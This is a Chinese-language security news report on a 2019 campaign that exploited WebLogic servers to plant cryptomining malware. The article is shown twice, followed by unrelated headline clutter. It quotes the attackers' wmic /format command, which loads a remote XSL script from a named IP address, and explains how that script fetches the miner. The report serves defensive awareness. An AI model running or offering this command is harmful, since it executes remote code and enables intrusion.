对抗杀软黑客使用新技术植入挖矿木马 发布时间:2019-08-15 12:26:29 对抗杀软!黑客使用新技术植入挖矿木马 360互联安全中心监控到有黑客团伙于今日凌晨对暴露在互联中的Weblogic服务端发起大规模攻击 。该黑客团伙使用Weblogic远程代码执行漏洞cve-攻击服务器,并利用最新攻击技术试图向服务器中植入挖矿木马。 攻击仅仅持续五分钟,受害服务器却超50台 根据360互联安全中心所监控到的情况,攻击开始于凌晨1点18分,结束于凌晨1点23分,持续时间只有五分钟。然而在这短短5分钟内,由于之前未对Weblogic服务端进行更新而遭到入侵的服务器数量超过50台。由于360安全卫士有效拦截其进一步攻击,黑客在1点23分之后停止攻击。图1展示了今日凌晨的攻击走势。 黑客使用最新无文件攻击技术对抗杀毒软件 黑客入侵服务器成功后,会执行如下命令:wmic os get /format:hxxp://149.28.76.165/l。该命令源于国外安全研究员Casey Smith在4月18日发现的最新无文件攻击技术(,可用于绕过Windows白名单限制。 wmic是WMI命令行,可以用来管理、操作WMI系统。用户能够通过wmic [wmicomand] /format:[filename]将wmi命令行的输出格式化到指定的xsl文件或者csv文件中。由于wmic设计上的逻辑错误,在将输出格式化到xsl文件中时可能导致xsl文件中嵌入的脚本代码被执行,该利用思路与regsvr32执行sct文件中的脚本代码类似,可被用于绕过Windows白名单执行恶意代码。此外,xsl文件也可以被托管在远程服务器上,因此黑客可以利用wmic实现无文件攻击。图2展示hxxp://149.28.76.165/l内容,不难发现该xsl文件中嵌入恶意的js脚本代码,这段脚本代码将从hxxp://149.28.76.165/e下载挖矿木马到服务器中进行挖矿。 hxxp://149.28.76.165/l的内容 由于杀毒软件对一些经常被用于无文件攻击的白文件(例如:e,e)进行了封锁,黑客急需一个新的替代品实现无文件攻击,而wmic正好能够胜任这项工作。自从这项攻击技术问世以来,利用这项技术完成执行的攻击时有发生,本次攻击是该攻击技术第一次被大规模使用。 360安全卫士早已对此攻击方式进行拦截 这项攻击技术问世之后,360安全卫士就及时对其进行拦截,使用360安全卫士的用户完全不必担心。 宝宝健脾胃的药有哪些一岁宝宝脸发黄是什么原因调理小儿脾胃虚弱的药整肠生长期吃有依赖性吗便秘吃什么食物可以缓解整肠生作用功效是什么整肠生和肠炎宁有哪些不同 猜你会喜欢的 信息科技继续推荐网优行业荐5股 财政部在港发行155亿人民币国债 参茸附片猪蹄汤 冬季吃这3种红色水果补血又益心 蒸野菜 蜜汁金耳的做法蜜汁金耳怎么做好吃 世界上的山寨中国国旗国徽几乎跟中国一模一 辉源实业首次举办企业管理交流会 怕冷的人可以适当喝些红酒 成吉思汗知道儿子不是亲生的后他竟这样做 毒妇人吕雉也曾是贤妻都是小三惹的祸1 唐肃宗李亨为何要害死自己的儿子1 猜你会喜欢的 修杰楷与贾静雯女儿相处融洽姐弟恋顺利发展 36岁爱戴孕后上围激增穿紧身裙透内衣八卦 吴雨霏着三点式吴雨霏大秀好身材 不顾母亲反对王心凌姚元浩高调牵手 南南Go时装周穿蛋糕裙提饭盒包的6S少女 冯女郎苗苗重现芳华海报动作网友还是有差距 纱荣子睡脸被赞像天使 杨乐乐发文为汪涵庆生大撒狗粮称宁静生活是
对抗杀软!黑客使用新技术植入挖矿木马 360互联安全中心监控到有黑客团伙于今日凌晨对暴露在互联中的Weblogic服务端发起大规模攻击 。该黑客团伙使用Weblogic远程代码执行漏洞cve-攻击服务器,并利用最新攻击技术试图向服务器中植入挖矿木马。 攻击仅仅持续五分钟,受害服务器却超50台 根据360互联安全中心所监控到的情况,攻击开始于凌晨1点18分,结束于凌晨1点23分,持续时间只有五分钟。然而在这短短5分钟内,由于之前未对Weblogic服务端进行更新而遭到入侵的服务器数量超过50台。由于360安全卫士有效拦截其进一步攻击,黑客在1点23分之后停止攻击。图1展示了今日凌晨的攻击走势。 黑客使用最新无文件攻击技术对抗杀毒软件 黑客入侵服务器成功后,会执行如下命令:wmic os get /format:hxxp://149.28.76.165/l。该命令源于国外安全研究员Casey Smith在4月18日发现的最新无文件攻击技术(,可用于绕过Windows白名单限制。 wmic是WMI命令行,可以用来管理、操作WMI系统。用户能够通过wmic [wmicomand] /format:[filename]将wmi命令行的输出格式化到指定的xsl文件或者csv文件中。由于wmic设计上的逻辑错误,在将输出格式化到xsl文件中时可能导致xsl文件中嵌入的脚本代码被执行,该利用思路与regsvr32执行sct文件中的脚本代码类似,可被用于绕过Windows白名单执行恶意代码。此外,xsl文件也可以被托管在远程服务器上,因此黑客可以利用wmic实现无文件攻击。图2展示hxxp://149.28.76.165/l内容,不难发现该xsl文件中嵌入恶意的js脚本代码,这段脚本代码将从hxxp://149.28.76.165/e下载挖矿木马到服务器中进行挖矿。 hxxp://149.28.76.165/l的内容 由于杀毒软件对一些经常被用于无文件攻击的白文件(例如:e,e)进行了封锁,黑客急需一个新的替代品实现无文件攻击,而wmic正好能够胜任这项工作。自从这项攻击技术问世以来,利用这项技术完成执行的攻击时有发生,本次攻击是该攻击技术第一次被大规模使用。 360安全卫士早已对此攻击方式进行拦截 这项攻击技术问世之后,360安全卫士就及时对其进行拦截,使用360安全卫士的用户完全不必担心。 宝宝健脾胃的药有哪些一岁宝宝脸发黄是什么原因调理小儿脾胃虚弱的药整肠生长期吃有依赖性吗便秘吃什么食物可以缓解整肠生作用功效是什么整肠生和肠炎宁有哪些不同
修杰楷与贾静雯女儿相处融洽姐弟恋顺利发展
36岁爱戴孕后上围激增穿紧身裙透内衣八卦
吴雨霏着三点式吴雨霏大秀好身材
不顾母亲反对王心凌姚元浩高调牵手
南南Go时装周穿蛋糕裙提饭盒包的6S少女
冯女郎苗苗重现芳华海报动作网友还是有差距
纱荣子睡脸被赞像天使
杨乐乐发文为汪涵庆生大撒狗粮称宁静生活是